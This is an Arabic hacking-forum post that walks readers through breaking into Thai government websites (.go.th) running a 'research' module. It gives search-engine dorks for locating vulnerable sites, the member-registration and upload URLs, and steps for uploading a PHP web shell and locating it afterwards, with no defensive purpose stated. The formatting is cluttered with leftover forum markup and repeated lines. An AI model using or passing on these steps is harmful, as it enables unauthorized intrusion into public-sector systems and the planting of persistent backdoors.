ثغرة خطيرة لاختراق المواقع الحكومية (research)
السلام عليكم
[FONT="]
ملاحظة مهمة: في كثير من الأحيان لا تعرض الصفحة بطريقة صحيحة فلا يظهر لك هيكل fckeditor لذا يتوجب عليك استخدام متصفح Opera لتجنب ذلك او استخدام الاضافات ك tamper data او auto fill[/FONT]
[FONT="]بالتوفيق للجميع.
[/FONT]
[FONT="]
[/FONT]
[/FONT]
[FONT="]Dork 1 :[/FONT]
كود:
site:go.th inurl:name=member+file=index
[FONT="]Dork 2:[/FONT]
كود:
site:go.th inurl:name=research
[FONT="]الصفحة الرئيسية:
[/FONT]
[/FONT]
كود:
[RIGHT][RIGHT][SIZE=3]http://www.xxx.go.th/?name=research[/SIZE]
[SIZE=3]http://www.xxx.go.th/index.php?name=research[/SIZE]
[SIZE=3]http://www.xxx.go.th/popup.php?name=research[/SIZE][/RIGHT]
[/RIGHT]
[FONT="]لرفع الشيل اذهب إلى هذا الرابط:
[/FONT]
[/FONT]
كود:
[RIGHT][RIGHT][SIZE=3]http://www.xxx.go.th/?name=research&file=add&op=research_add[/SIZE]
[SIZE=3]http://www.xxx.go.th/index.php?name=research&file=add&op=research_add[/SIZE]
[SIZE=3]http://www.xxx.go.th/popup.php?name=research&file=add&op=research_add[/SIZE][/RIGHT]
[/RIGHT]
[FONT="]إذا ظهرت رسالة الخطأ هذه:
[/FONT][
[/FONT][
[FONT="]التي تهني : "أنت لست عضوا"
[/FONT]
[/FONT]
[FONT="]يتوجب عليك التسجيل من هذا الرابط:
[/FONT]
[/FONT]
كود:
[SIZE=3]
[/SIZE][RIGHT][RIGHT][SIZE=3]http://www.xxx.go.th/?name=member&file=index[/SIZE]
[SIZE=3]http://www.xxx.go.th/index.php?name=member&file=index[/SIZE]
[SIZE=3]http://www.xxx.go.th/popup.php?name=member&file=index[/SIZE][/RIGHT]
[/RIGHT]
[FONT="]لرفع الشيل عليك بملأ الحقول كما في الصورة:[/FONT]
[FONT="]---------------------------------------------------
بعد ذلك ارجع إلى صفحة البداية لترى ملفك:
[/FONT]
بعد ذلك ارجع إلى صفحة البداية لترى ملفك:
[/FONT]
كود:
[RIGHT][RIGHT][SIZE=3]http://www.xxx.go.th/?name=research[/SIZE]
[SIZE=3]http://www.xxx.go.th/index.php?name=research[/SIZE]
[SIZE=3]http://www.xxx.go.th/popup.php?name=research[/SIZE][/RIGHT]
[/RIGHT]
[FONT="]ثم اضغط على "FullText" كما في الصورة:[/FONT]
[FONT="]
[/FONT]
[FONT="]
[/FONT]
[FONT="]
[/FONT]
[FONT="]
[FONT="]-----------------------------------------------------------------------------
[/FONT]
[/FONT]
[FONT="]انتظر عشر ثواني:
[/FONT]
[/FONT]
[FONT="]
[/FONT]
[/FONT]
[FONT="] ----------------------------------------------[/FONT]
[FONT="]
[/FONT]
[FONT="]
[/FONT]
[FONT="]ثم اضغط على download :[/FONT]
[FONT="]
[/FONT]
[FONT="]سيتم توجيهك الى رابط الشيل الذي يكون كهذا:
[/FONT]
[/FONT]
[FONT="]سيتم توجيهك الى رابط الشيل الذي يكون كهذا:
[/FONT]
كود:
http://www.xxx.go.th/dontry/data/research_1340954535_z.php
ملاحظة مهمة: في كثير من الأحيان لا تعرض الصفحة بطريقة صحيحة فلا يظهر لك هيكل fckeditor لذا يتوجب عليك استخدام متصفح Opera لتجنب ذلك او استخدام الاضافات ك tamper data او auto fill[/FONT]
[FONT="]بالتوفيق للجميع.
[/FONT]
التعديل الأخير:
اسم الموضوع : ثغرة خطيرة لاختراق المواقع الحكومية (research)
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات